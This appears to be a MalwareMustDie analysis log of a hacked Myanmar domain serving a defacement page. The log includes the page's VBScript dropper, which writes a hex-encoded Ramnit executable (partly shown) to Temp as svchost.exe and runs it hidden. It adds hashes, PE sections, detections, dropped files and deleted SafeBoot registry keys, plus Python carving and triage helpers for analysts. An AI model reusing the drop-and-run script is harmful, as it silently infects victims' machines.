- # MalwareMustDie! @unixfreaxjp /malware]$ date
- # Sat Mar 2 15:33:51 JST 2013
- # Case: ...And the Hack Group Re-using the old-timer Malware..
- # in this case: RAMNIT!!
- // The below domain was just hacked....
- Domain Name: MYANWEBS.COM
- Registrar: GODADDY.COM, LLC
- Registered through: GoDaddy.com, LLC (http://www.godaddy.com)
- Domain Name: MYANWEBS.COM
- Created on: 29-Nov-10
- Expires on: 29-Nov-13
- Last Updated on: 06-Nov-12
- Registrant:
- TKT Web Studio
- No.45, Shwe Ta Chaung Road, Pyay, Pegu
- Yangon, NA, Myanmar
- Administrative/Technical Contact:
- AUNG, KYAW KYAW kyawkyaw26273@gmail.com
- TKT Web Studio
- No.45, Shwe Ta Chaung Road, Pyay, Pegu
- Yangon, NA
- Myanmar
- +95.5326506
- Domain servers in listed order:
- NS1.MYANWEBS.COM NS2.MYANWEBS.COM
- NS3.MYANWEBS.COM NS4.MYANWEBS.COM
- NS5.MYANWEBS.COM
- // The hacked domain serves the malware from the URL below...
- h00p://penjaga123.myanwebs.com/
- // Let's check it out....
- // fetch and checks...
- --2013-03-02 14:42:02-- h00p://penjaga123.myanwebs.com/
- Resolving penjaga123.myanwebs.com... seconds 0.00, 209.51.196.242
- Caching penjaga123.myanwebs.com => 209.51.196.242
- Connecting to penjaga123.myanwebs.com|209.51.196.242|:80... seconds 0.00, connected.
- :
- GET / HTTP/1.0
- Referer: http://malwaremustdie.blogspot.com
- User-Agent: MalwareMustDie Still Banging Malware Moronz!
- Host: penjaga123.myanwebs.com
- HTTP request sent, awaiting response...
- :
- HTTP/1.0 200 OK
- Date: Sat, 02 Mar 2013 05:41:45 GMT
- Server: ATS/3.2.0
- Cache-Control: no-store, must-revalidate, max-age=0, proxy-revalidate, no-transform
- Expires: Sat, 02 Mar 2013 05:41:45 GMT
- Vary: Accept-Encoding,User-Agent
- Pragma: no-cache
- Content-Type: text/html
- Age: 2
- Connection: close
- :
- 200 OK
- Length: unspecified [text/html]
- Saving to: `index.html'
- 2013-03-02 14:42:09 (140 KB/s) - `index.html' saved [824550]
- // looks like this... (elinks)
- [lol.gif]
- #OPWorld
- __________________________________________________________________________________________
- __________________________________________________________________________________________
- hello world ..
- This is the operation for the country of Myanmar.
- Do not have the name of religion to carry out attacks on our site!
- Our silence is not because we are weak,
- we only demand retribution for our site that you hack ..
- Lamers you simply useless! Our army is god ..
- without insulting religion and your beliefs.
- This is our way!
- Thank's: Legend Irhabi007 - Hmei7 - Syntax_error - 3vil666 - Bocah Netter -
- Drac Code 101 - Mujahidin Cyber // animated...
- __________________________________________________________________________________________
- __________________________________________________________________________________________
- IFRAME: h00p://w.soundcloud.com/player/?url=http%3A%2F%2Fapi.soundcloud.com%2Ftracks%2F80972118&auto_play=true&show_artwork=true&color=ff7700
- // some f*ckin music...
- // Using the METAs below:
- <meta name="revisit-after" content="3">
- <meta name="rating" content="general">
- <meta name="classification" content="Internet Services">
- <meta name="googlebot" content="index,follow">
- <meta name="google rank" content="1">
- <meta name="robots" content="all">
- <meta name="robots schedule" content="auto">
- // Saves the malware binary to the PC as svchost.exe via VBScript,
- // method: CreateObject("Scripting.FileSystemObject"); GetSpecialFolder(2) is the Temp folder
- //
- // and runs it with WScript.Shell.Run (window style 0 = hidden)...
- <SCRIPT Language=VBScript><!--
- DropFileName = "svchost.exe"
- WriteData = "4D5A90000300000004000000FFFF0000B800000000000000400000000
- 000000000000000000000000000000000000000000000000000000000000000E800000
- 00E1FBA0E00B409CD21B80120444F53206D6F64652E0D0D0A2400000000000000D72D8
- :
- :
- 83B00C8B43A419EA051319A4422C6694D6B9006D4C6BFA184413161CDB446B9B5816E556
- 47B2B925A289418B2F487D4B8E713A64E68F01A930573A8B1B5BD2C84C0720CCB99C5915
- 62791956C46A1352C2B8DB97C0B643016782B16B5F3FEC20D28029FB257E1208E92338BB
- A8B1CCBF43994903D0831640459BE377D495BF10A5341C85CCA36FBDA94A1D37279AFEBF
- 34F996CAB780F9D948558655C4B019DAF9F4F6100EC46591F2024F9263448E14178B9DBB
- 44CA67E42C9B151B938631D3FCD4401FCCAB15106DBB151"
- Set FSO = CreateObject("Scripting.FileSystemObject")
- DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName
- If FSO.FileExists(DropPath)=False Then
- Set FileObj = FSO.CreateTextFile(DropPath, True)
- For i = 1 To Len(WriteData) Step 2
- FileObj.Write Chr(CLng("&H" & Mid(WriteData,i,2)))
- Next
- FileObj.Close
- End If
- Set WSHshell = CreateObject("WScript.Shell")
- WSHshell.Run DropPath, 0
- //--></SCRIPT>
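- Added example (not code from the paste): a carving helper for the drop-and-run pattern above. It spots the FileSystemObject / WScript.Shell markers, pulls the `WriteData` hex literal out of a constructed copy of the dropper page, decodes it and checks the MZ header and `e_lfanew`; SAMPLE_HTML and the function names are this example's own, and its hex is only the first 64 bytes of the dropped file.

```python
"""Carve the hex-encoded executable out of a VBScript drop-and-run page.
Added example, not from the original paste. SAMPLE_HTML is constructed; its
hex payload is just the first 64 bytes (DOS header) of the dropped file as
shown in the analysis, enough to exercise the checks below."""
import hashlib
import re
import struct

# Constructed sample: the dropper script as seen above, with the long hex literal
# split with a VBScript line continuation (`& _`) as such pages often do.
SAMPLE_HTML = r'''<html><body>
<SCRIPT Language=VBScript><!--
DropFileName = "svchost.exe"
WriteData = "4D5A90000300000004000000FFFF0000B8000000000000004000000000000000" & _
            "00000000000000000000000000000000000000000000000000000000E8000000"
Set FSO = CreateObject("Scripting.FileSystemObject")
DropPath = FSO.GetSpecialFolder(2) & "\" & DropFileName
Set WSHshell = CreateObject("WScript.Shell")
WSHshell.Run DropPath, 0
//--></SCRIPT>
</body></html>'''

# Behavioural markers of the pattern, independent of the payload bytes.
DROPPER_MARKERS = (
    "Scripting.FileSystemObject",   # file-write primitive
    "GetSpecialFolder(2)",          # 2 = TemporaryFolder
    "WScript.Shell",                # process-launch primitive
    ".Run ",
)

# `Name = "hex" & _ "hex" ...`: one string assignment, pieces joined by `&` with
# optional `_` line continuations between them.
HEX_ASSIGN = re.compile(r'(\w+)\s*=\s*((?:"[0-9A-Fa-f]*"\s*(?:&\s*_?\s*)?)+)')


def find_dropper_markers(html: str) -> list:
    """Return the drop-and-run markers present in the page."""
    return [m for m in DROPPER_MARKERS if m in html]


def carve_hex_payload(html: str) -> bytes:
    """Decode the longest hex string literal assigned anywhere in the page."""
    best = b""
    for _name, pieces in HEX_ASSIGN.findall(html):
        hexstr = "".join(re.findall(r'"([0-9A-Fa-f]*)"', pieces))
        if len(hexstr) % 2 or len(hexstr) < 64:
            continue                      # odd length or too short to be a binary
        data = bytes.fromhex(hexstr)
        if len(data) > len(best):
            best = data
    return best


def describe_payload(data: bytes) -> dict:
    """Sanity-check the carved bytes as a PE image and hash them."""
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0] if len(data) >= 0x40 else None
    return {
        "size": len(data),
        "mz": data[:2] == b"MZ",          # DOS header magic
        "e_lfanew": e_lfanew,             # offset of the "PE\0\0" signature
        "sha256": hashlib.sha256(data).hexdigest(),
    }


if __name__ == "__main__":
    print("markers:", find_dropper_markers(SAMPLE_HTML))
    print("payload:", describe_payload(carve_hex_payload(SAMPLE_HTML)))
```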
- // dropped binary:
- MD5 : e450435280ba806dc2d8115b172e1e40
- SHA256 : 3c3bda34253d238f78bf7915982956d872bcdc4f21e92287e462e7e8d976abe8
- Sections:
- .text 0x1000 0x2200 8704
- .data 0x4000 0x9730 4608
- .rsrc 0xe000 0x78c 2048
- .rdata 0xf000 0x1ae0f 108559
- kgoodcb 0x2a000 0x13000 77824 <==== needs unpacking/decoding
- .text 0x3d000 0x33000 205824 <=== needs unpacking/decoding
- Entry Point at 0x31a00
- Virtual Address is 0x43d000
- CRC Fail: Claimed: 0, Actual: 416781
- Compile Time: 0x40617B91 [Wed Mar 24 12:14:09 2004 UTC]
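- Added example (not code from the paste): a section-table triage that shows why the entry point lands in the second, appended ".text" section, and how the reported EP file offset 0x31a00 and VA 0x43d000 follow from the table above. The header is rebuilt with struct from the values listed in the analysis; section flags and raw-data offsets are not in the paste and are constructed here.

```python
"""PE section-table triage: which section really holds the entry point?
Added example, not from the original paste. The header is rebuilt with struct
from the values reported above (6 sections, EP RVA 0x3D000, ImageBase 0x400000,
TimeDateStamp 0x40617B91, CheckSum 0); section flags and raw offsets are constructed."""
import struct
from datetime import datetime, timezone

# (name, VirtualAddress, VirtualSize, SizeOfRawData, Characteristics). .rdata is
# listed with 108559 raw bytes; it is rounded up to the 0x200 FileAlignment so
# the raw offsets add up to the reported entry-point file offset 0x31A00.
SECTIONS = [
    (b".text",   0x1000,  0x2200,  0x2200,  0x60000020),
    (b".data",   0x4000,  0x9730,  0x1200,  0xC0000040),
    (b".rsrc",   0xE000,  0x78C,   0x800,   0x40000040),
    (b".rdata",  0xF000,  0x1AE0F, 0x1AA00, 0x40000040),
    (b"kgoodcb", 0x2A000, 0x13000, 0x13000, 0xE0000020),   # constructed flags
    (b".text",   0x3D000, 0x33000, 0x33000, 0xE0000020),   # constructed flags
]

def build_header() -> bytes:
    """DOS header + PE signature + COFF header + PE32 optional header + sections."""
    dos = bytearray(0xE8)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0xE8)                  # e_lfanew
    coff = struct.pack("<4sHHIIIHH", b"PE\0\0", 0x14C, len(SECTIONS),
                       0x40617B91, 0, 0, 0xE0, 0x010F)
    opt = bytearray(0xE0)                                    # data directories left 0
    struct.pack_into("<HBBIIIIIIIIIHHHHHHIIIIHHIIIIII", opt, 0, 0x10B, 6, 4,
                     0x2200, 0x1E000, 0x800, 0x3D000, 0x1000, 0x4000, 0x400000,
                     0x1000, 0x200, 4, 0, 5, 1, 4, 0, 0, 0x70000, 0x400,
                     0,                                      # CheckSum: claimed 0
                     2, 0x8000, 0x400000, 0x6000, 0x400000, 0x1000, 0, 16)
    table, raw_ptr = b"", 0x400                              # first raw data after headers
    for name, va, vsize, raw, flags in SECTIONS:
        table += struct.pack("<8sIIIIIIHHI", name, vsize, va, raw, raw_ptr, 0, 0, 0, 0, flags)
        raw_ptr += raw
    return bytes(dos) + coff + bytes(opt) + table

def parse_pe(data: bytes) -> dict:
    """Read the header fields needed to locate and judge the entry point."""
    pe = struct.unpack_from("<I", data, 0x3C)[0]
    sig, _, nsec, stamp, _, _, opt_size, _ = struct.unpack_from("<4sHHIIIHH", data, pe)
    if sig != b"PE\0\0":
        raise ValueError("missing PE signature")
    opt = pe + 24
    (ep,), (base,), (csum,) = (struct.unpack_from("<I", data, opt + o) for o in (16, 28, 64))
    secs = []
    for i in range(nsec):
        n, vs, va, rs, rp, _, _, _, _, fl = struct.unpack_from("<8sIIIIIIHHI", data, opt + opt_size + 40 * i)
        secs.append({"name": n.rstrip(b"\0").decode(), "va": va, "vsize": vs, "raw": rs, "ptr": rp, "flags": fl})
    return {"ep": ep, "base": base, "stamp": stamp, "checksum": csum, "sections": secs}

def triage(pe: dict) -> dict:
    """Map the EP to its section and flag the signs of appended, redirected code."""
    secs, ep = pe["sections"], pe["ep"]
    idx = next(i for i, s in enumerate(secs) if s["va"] <= ep < s["va"] + max(s["vsize"], s["raw"]))
    s, names = secs[idx], [x["name"] for x in secs]
    first_exec = next(i for i, x in enumerate(secs) if x["flags"] & 0x20000000)   # IMAGE_SCN_MEM_EXECUTE
    findings = []
    if idx != first_exec:
        findings.append("EP outside the first executable section (%s)" % names[first_exec])
    if idx == len(secs) - 1:
        findings.append("EP in the last section: code appended after the original image")
    if len(set(names)) != len(names):
        findings.append("duplicate section names: " + ", ".join(sorted({n for n in names if names.count(n) > 1})))
    return {"ep_va": pe["base"] + ep, "ep_file_offset": s["ptr"] + (ep - s["va"]),
            "ep_section": "%s (#%d of %d)" % (s["name"], idx + 1, len(secs)), "checksum_claimed": pe["checksum"],
            "compile_time": datetime.fromtimestamp(pe["stamp"], timezone.utc).strftime("%Y-%m-%d %H:%M:%S UTC"),
            "findings": findings}

if __name__ == "__main__":
    print(triage(parse_pe(build_header())))
```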
- // Faking Adobe (Macromedia) Flash Player version info...
- LangID: 040904b0
- LegalCopyright: Copyright © 1996-2003 Macromedia, Inc.
- InternalName: Macromedia Flash Player 7.0
- FileVersion: 7,0,19,0
- CompanyName: Macromedia, Inc.
- LegalTrademarks: Macromedia Flash Player
- ProductName: Shockwave Flash
- ProductVersion: 7,0,19,0
- FileDescription: Macromedia Flash Player 7.0 r19
- OriginalFilename: SAFlashPlayer.exe
- // Hex:
- // Quick reputation check on VirusTotal...
- URL: https://www.virustotal.com/en/file/3c3bda34253d238f78bf7915982956d872bcdc4f21e92287e462e7e8d976abe8/analysis/1362204046/
- SHA256: 3c3bda34253d238f78bf7915982956d872bcdc4f21e92287e462e7e8d976abe8
- SHA1: 823cb691fa3193ff7bb7fd071acf9d1f68edf527
- MD5: e450435280ba806dc2d8115b172e1e40
- File size: 399.9 KB ( 409536 bytes )
- File name: SAFlashPlayer.exe
- File type: Win32 EXE
- Tags: peexe
- Detection: 41 / 46
- Analysis: 2013-03-02 06:00:46 UTC ( 5 minutes ago )
- Malware Names:
- nProtect : Virus/W32.SpyEye
- CAT-QuickHeal : W32.Ramnit.A
- McAfee : W32/Ramnit.a
- Malwarebytes : Trojan.Downloader
- K7AntiVirus : Virus
- Agnitum : Win32.Sality.BK
- F-Prot : W32/Ramnit.D
- Symantec : Packed.Protexor!gen1
- Norman : Sality.ZHB
- TotalDefense : Win32/Ramnit.C
- TrendMicro-HouseCall : PE_RAMNIT.DEN
- Avast : Win32:RmnDrp
- ClamAV : W32.Ramnit-3
- Kaspersky : Virus.Win32.Nimnul.a
- BitDefender : Win32.Ramnit.N
- NANO-Antivirus : Virus.Win32.Nimnul.bmnup
- ViRobot : Win32.Nimnul.A
- Emsisoft : Win32.Ramnit.N (B)
- Comodo : Virus.Win32.Ramnit.K
- F-Secure : Win32.Ramnit.N
- DrWeb : Win32.Rmnet.8
- VIPRE : Virus.Win32.Ramnit.b (v)
- AntiVir : W32/Ramnit.C
- TrendMicro : PE_RAMNIT.DEN
- McAfee-GW-Edition : Heuristic.BehavesLike.Win32.Suspicious-BAY.K
- Sophos : W32/Ramnit-A
- Jiangmin : Win32/IRCNite.wi
- Kingsoft : Win32.Ramnit.lx.30720
- Microsoft : Virus:Win32/Ramnit.I
- SUPERAntiSpyware : Trojan.Agent/Gen-Pune
- GData : Win32.Ramnit.N
- Commtouch : W32/Ramnit.D
- AhnLab-V3 : Win32/Ramnit.I
- VBA32 : Virus.Win32.Nimnul.b
- PCTools : HeurEngine.Protexor
- ESET-NOD32 : Win32/Ramnit.H
- Rising : Win32.Mgr.a
- Ikarus : Virus.Win32.Ramnit
- Fortinet : W32/Ramnit.C
- AVG : Win32/Zbot.G
- Panda : W32/Nimnul.A
- // Malware created / overwritten files:
- C:\Documents and Settings\User\Local Settings\Temp\winncbnga.exe
- C:\Program Files\Microsoft\WaterMark.exe
- C:\TEST\samplemgr.exe
- C:\WINDOWS\system32\dmlconf.dat
- C:\WINDOWS\system.ini
- // Kicked-off processes...
- 0x1dc WaterMark.exe C:\Program Files\Microsoft\WaterMark.exe
- 0x1e4 WaterMark.exe C:\Program Files\Microsoft\WaterMark.exe
- 0x20c svchost.exe C:\WINDOWS\system32\svchost.exe // this binary..
- 0x210 svchost.exe C:\WINDOWS\system32\svchost.exe // this binary..
- // Loaded SYS/driver
- \SystemRoot\System32\Drivers\Fastfat.SYS
- // all of these registry keys are deleted....
- HKLM\System\CurrentControlSet\Control\SafeBoot\AlternateShell REG_SZ 16 "cmd.exe"
- HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\{36FC9E60-C465-11CF-8056-444553540000}\ REG_SZ 66 "Universal Serial Bus controllers"
- HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\{4D36E965-E325-11CE-BFC1-08002BE10318}\ REG_SZ 26 "CD-ROM Drive"
- HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\{4D36E967-E325-11CE-BFC1-08002BE10318}\ REG_SZ 20 "DiskDrive"
- HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\{4D36E969-E325-11CE-BFC1-08002BE10318}\ REG_SZ 64 "Standard floppy disk controller"
- HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\{4D36E96A-E325-11CE-BFC1-08002BE10318}\ REG_SZ 8 "Hdc"
- HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\{4D36E96B-E325-11CE-BFC1-08002BE10318}\ REG_SZ 18 "Keyboard"
- HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\{4D36E96F-E325-11CE-BFC1-08002BE10318}\ REG_SZ 12 "Mouse"
- HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\{4D36E977-E325-11CE-BFC1-08002BE10318}\ REG_SZ 32 "PCMCIA Adapters"
- HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\{4D36E97B-E325-11CE-BFC1-08002BE10318}\ REG_SZ 24 "SCSIAdapter"
- HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\{4D36E97D-E325-11CE-BFC1-08002BE10318}\ REG_SZ 14 "System"
- HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\{4D36E980-E325-11CE-BFC1-08002BE10318}\ REG_SZ 36 "Floppy disk drive"
- HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\{71A27CDD-812A-11D0-BEC7-08002BE2092F}\ REG_SZ 14 "Volume"
- HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\{745A17A0-74D3-11D0-B6FE-00A0C90F57DA}\ REG_SZ 48 "Human Interface Devices"
- HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\AppMgmt\ REG_SZ 16 "Service"
- HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\Base\ REG_SZ 26 "Driver Group"
- HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\Boot Bus Extender\ REG_SZ 26 "Driver Group"
- HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\Boot file system\ REG_SZ 26 "Driver Group"
- HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\CryptSvc\ REG_SZ 16 "Service"
- HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\DcomLaunch\ REG_SZ 16 "Service"
- HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\dmadmin\ REG_SZ 16 "Service"
- HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\dmboot.sys\ REG_SZ 14 "Driver"
- HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\dmio.sys\ REG_SZ 14 "Driver"
- HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\dmload.sys\ REG_SZ 14 "Driver"
- HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\dmserver\ REG_SZ 16 "Service"
- HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\EventLog\ REG_SZ 16 "Service"
- HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\File system\ REG_SZ 26 "Driver Group"
- HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\Filter\ REG_SZ 26 "Driver Group"
- HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\HelpSvc\ REG_SZ 16 "Service"
- HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\Netlogon\ REG_SZ 16 "Service"
- HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\PCI Configuration\ REG_SZ 26 "Driver Group"
- HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\PlugPlay\ REG_SZ 16 "Service"
- HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\PNP Filter\ REG_SZ 26 "Driver Group"
- HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\Primary disk\ REG_SZ 26 "Driver Group"
- HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\RpcSs\ REG_SZ 16 "Service"
- HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\SCSI Class\ REG_SZ 26 "Driver Group"
- HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\sermouse.sys\ REG_SZ 14 "Driver"
- HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\sr.sys\ REG_SZ 50 "FSFilter System Recovery"
- HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\SRService\ REG_SZ 16 "Service"
- HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\System Bus Extender\ REG_SZ 26 "Driver Group"
- HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\vga.sys\ REG_SZ 14 "Driver"
- HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\vgasave.sys\ REG_SZ 14 "Driver"
- HKLM\System\CurrentControlSet\Control\SafeBoot\Minimal\WinMgmt\ REG_SZ 16 "Service"
- HKLM\System\CurrentControlSet\Control\SafeBoot\Network\{36FC9E60-C465-11CF-8056-444553540000}\ REG_SZ 66 "Universal Serial Bus controllers"
- HKLM\System\CurrentControlSet\Control\SafeBoot\Network\{4D36E965-E325-11CE-BFC1-08002BE10318}\ REG_SZ 26 "CD-ROM Drive"
- HKLM\System\CurrentControlSet\Control\SafeBoot\Network\{4D36E967-E325-11CE-BFC1-08002BE10318}\ REG_SZ 20 "DiskDrive"
- HKLM\System\CurrentControlSet\Control\SafeBoot\Network\{4D36E969-E325-11CE-BFC1-08002BE10318}\ REG_SZ 64 "Standard floppy disk controller"
- HKLM\System\CurrentControlSet\Control\SafeBoot\Network\{4D36E96A-E325-11CE-BFC1-08002BE10318}\ REG_SZ 8 "Hdc"
- HKLM\System\CurrentControlSet\Control\SafeBoot\Network\{4D36E96B-E325-11CE-BFC1-08002BE10318}\ REG_SZ 18 "Keyboard"
- HKLM\System\CurrentControlSet\Control\SafeBoot\Network\{4D36E96F-E325-11CE-BFC1-08002BE10318}\ REG_SZ 12 "Mouse"
- HKLM\System\CurrentControlSet\Control\SafeBoot\Network\{4D36E972-E325-11CE-BFC1-08002BE10318}\ REG_SZ 8 "Net"
- HKLM\System\CurrentControlSet\Control\SafeBoot\Network\{4D36E973-E325-11CE-BFC1-08002BE10318}\ REG_SZ 20 "NetClient"
- HKLM\System\CurrentControlSet\Control\SafeBoot\Network\{4D36E974-E325-11CE-BFC1-08002BE10318}\ REG_SZ 22 "NetService"
- HKLM\System\CurrentControlSet\Control\SafeBoot\Network\{4D36E975-E325-11CE-BFC1-08002BE10318}\ REG_SZ 18 "NetTrans"
- HKLM\System\CurrentControlSet\Control\SafeBoot\Network\{4D36E977-E325-11CE-BFC1-08002BE10318}\ REG_SZ 32 "PCMCIA Adapters"
- HKLM\System\CurrentControlSet\Control\SafeBoot\Network\{4D36E97B-E325-11CE-BFC1-08002BE10318}\ REG_SZ 24 "SCSIAdapter"
- HKLM\System\CurrentControlSet\Control\SafeBoot\Network\{4D36E97D-E325-11CE-BFC1-08002BE10318}\ REG_SZ 14 "System"
- HKLM\System\CurrentControlSet\Control\SafeBoot\Network\{4D36E980-E325-11CE-BFC1-08002BE10318}\ REG_SZ 36 "Floppy disk drive"
- HKLM\System\CurrentControlSet\Control\SafeBoot\Network\{71A27CDD-812A-11D0-BEC7-08002BE2092F}\ REG_SZ 14 "Volume"
- HKLM\System\CurrentControlSet\Control\SafeBoot\Network\{745A17A0-74D3-11D0-B6FE-00A0C90F57DA}\ REG_SZ 48 "Human Interface Devices"
- HKLM\System\CurrentControlSet\Control\SafeBoot\Network\AFD\ REG_SZ 16 "Service"
- HKLM\System\CurrentControlSet\Control\SafeBoot\Network\AppMgmt\ REG_SZ 16 "Service"
- HKLM\System\CurrentControlSet\Control\SafeBoot\Network\Base\ REG_SZ 26 "Driver Group"
- HKLM\System\CurrentControlSet\Control\SafeBoot\Network\Boot Bus Extender\ REG_SZ 26 "Driver Group"
- HKLM\System\CurrentControlSet\Control\SafeBoot\Network\Boot file system\ REG_SZ 26 "Driver Group"
- HKLM\System\CurrentControlSet\Control\SafeBoot\Network\Browser\ REG_SZ 16 "Service"
- HKLM\System\CurrentControlSet\Control\SafeBoot\Network\CryptSvc\ REG_SZ 16 "Service"
- HKLM\System\CurrentControlSet\Control\SafeBoot\Network\DcomLaunch\ REG_SZ 16 "Service"
- HKLM\System\CurrentControlSet\Control\SafeBoot\Network\Dhcp\ REG_SZ 16 "Service"
- HKLM\System\CurrentControlSet\Control\SafeBoot\Network\dmadmin\ REG_SZ 16 "Service"
- HKLM\System\CurrentControlSet\Control\SafeBoot\Network\dmboot.sys\ REG_SZ 14 "Driver"
- HKLM\System\CurrentControlSet\Control\SafeBoot\Network\dmio.sys\ REG_SZ 14 "Driver"
- HKLM\System\CurrentControlSet\Control\SafeBoot\Network\dmload.sys\ REG_SZ 14 "Driver"
- HKLM\System\CurrentControlSet\Control\SafeBoot\Network\dmserver\ REG_SZ 16 "Service"
- HKLM\System\CurrentControlSet\Control\SafeBoot\Network\DnsCache\ REG_SZ 16 "Service"
- HKLM\System\CurrentControlSet\Control\SafeBoot\Network\EventLog\ REG_SZ 16 "Service"
- HKLM\System\CurrentControlSet\Control\SafeBoot\Network\File system\ REG_SZ 26 "Driver Group"
- HKLM\System\CurrentControlSet\Control\SafeBoot\Network\Filter\ REG_SZ 26 "Driver Group"
- HKLM\System\CurrentControlSet\Control\SafeBoot\Network\HelpSvc\ REG_SZ 16 "Service"
- HKLM\System\CurrentControlSet\Control\SafeBoot\Network\ip6fw.sys\ REG_SZ 14 "Driver"
- HKLM\System\CurrentControlSet\Control\SafeBoot\Network\ipnat.sys\ REG_SZ 14 "Driver"
- HKLM\System\CurrentControlSet\Control\SafeBoot\Network\LanmanServer\ REG_SZ 16 "Service"
- HKLM\System\CurrentControlSet\Control\SafeBoot\Network\LanmanWorkstation\ REG_SZ 16 "Service"
- HKLM\System\CurrentControlSet\Control\SafeBoot\Network\LmHosts\ REG_SZ 16 "Service"
- HKLM\System\CurrentControlSet\Control\SafeBoot\Network\Messenger\ REG_SZ 16 "Service"
- HKLM\System\CurrentControlSet\Control\SafeBoot\Network\NDIS Wrapper\ REG_SZ 26 "Driver Group"
- HKLM\System\CurrentControlSet\Control\SafeBoot\Network\NDIS\ REG_SZ 26 "Driver Group"
- HKLM\System\CurrentControlSet\Control\SafeBoot\Network\Ndisuio\ REG_SZ 16 "Service"
- HKLM\System\CurrentControlSet\Control\SafeBoot\Network\NetBIOS\ REG_SZ 16 "Service"
- HKLM\System\CurrentControlSet\Control\SafeBoot\Network\NetBIOSGroup\ REG_SZ 26 "Driver Group"
- HKLM\System\CurrentControlSet\Control\SafeBoot\Network\NetBT\ REG_SZ 16 "Service"
- HKLM\System\CurrentControlSet\Control\SafeBoot\Network\NetDDEGroup\ REG_SZ 26 "Driver Group"
- HKLM\System\CurrentControlSet\Control\SafeBoot\Network\Netlogon\ REG_SZ 16 "Service"
- HKLM\System\CurrentControlSet\Control\SafeBoot\Network\NetMan\ REG_SZ 16 "Service"
- HKLM\System\CurrentControlSet\Control\SafeBoot\Network\Network\ REG_SZ 26 "Driver Group"
- HKLM\System\CurrentControlSet\Control\SafeBoot\Network\NetworkProvider\ REG_SZ 26 "Driver Group"
- HKLM\System\CurrentControlSet\Control\SafeBoot\Network\NtLmSsp\ REG_SZ 16 "Service"
- HKLM\System\CurrentControlSet\Control\SafeBoot\Network\PCI Configuration\ REG_SZ 26 "Driver Group"
- HKLM\System\CurrentControlSet\Control\SafeBoot\Network\PlugPlay\ REG_SZ 16 "Service"
- HKLM\System\CurrentControlSet\Control\SafeBoot\Network\PNP Filter\ REG_SZ 26 "Driver Group"
- HKLM\System\CurrentControlSet\Control\SafeBoot\Network\PNP_TDI\ REG_SZ 26 "Driver Group"
- HKLM\System\CurrentControlSet\Control\SafeBoot\Network\Primary disk\ REG_SZ 26 "Driver Group"
- HKLM\System\CurrentControlSet\Control\SafeBoot\Network\rdpcdd.sys\ REG_SZ 14 "Driver"
- HKLM\System\CurrentControlSet\Control\SafeBoot\Network\rdpdd.sys\ REG_SZ 14 "Driver"
- HKLM\System\CurrentControlSet\Control\SafeBoot\Network\rdpwd.sys\ REG_SZ 14 "Driver"
- HKLM\System\CurrentControlSet\Control\SafeBoot\Network\rdsessmgr\ REG_SZ 16 "Service"
- HKLM\System\CurrentControlSet\Control\SafeBoot\Network\RpcSs\ REG_SZ 16 "Service"
- HKLM\System\CurrentControlSet\Control\SafeBoot\Network\SCSI Class\ REG_SZ 26 "Driver Group"
- HKLM\System\CurrentControlSet\Control\SafeBoot\Network\sermouse.sys\ REG_SZ 14 "Driver"
- HKLM\System\CurrentControlSet\Control\SafeBoot\Network\SharedAccess\ REG_SZ 16 "Service"
- HKLM\System\CurrentControlSet\Control\SafeBoot\Network\sr.sys\ REG_SZ 50 "FSFilter System Recovery"
- HKLM\System\CurrentControlSet\Control\SafeBoot\Network\SRService\ REG_SZ 16 "Service"
- HKLM\System\CurrentControlSet\Control\SafeBoot\Network\Streams Drivers\ REG_SZ 26 "Driver Group"
- HKLM\System\CurrentControlSet\Control\SafeBoot\Network\System Bus Extender\ REG_SZ 26 "Driver Group"
- HKLM\System\CurrentControlSet\Control\SafeBoot\Network\Tcpip\ REG_SZ 16 "Service"
- HKLM\System\CurrentControlSet\Control\SafeBoot\Network\TDI\ REG_SZ 26 "Driver Group"
- HKLM\System\CurrentControlSet\Control\SafeBoot\Network\tdpipe.sys\ REG_SZ 14 "Driver"
- HKLM\System\CurrentControlSet\Control\SafeBoot\Network\tdtcp.sys\ REG_SZ 14 "Driver"
- HKLM\System\CurrentControlSet\Control\SafeBoot\Network\termservice\ REG_SZ 16 "Service"
- HKLM\System\CurrentControlSet\Control\SafeBoot\Network\vga.sys\ REG_SZ 14 "Driver"
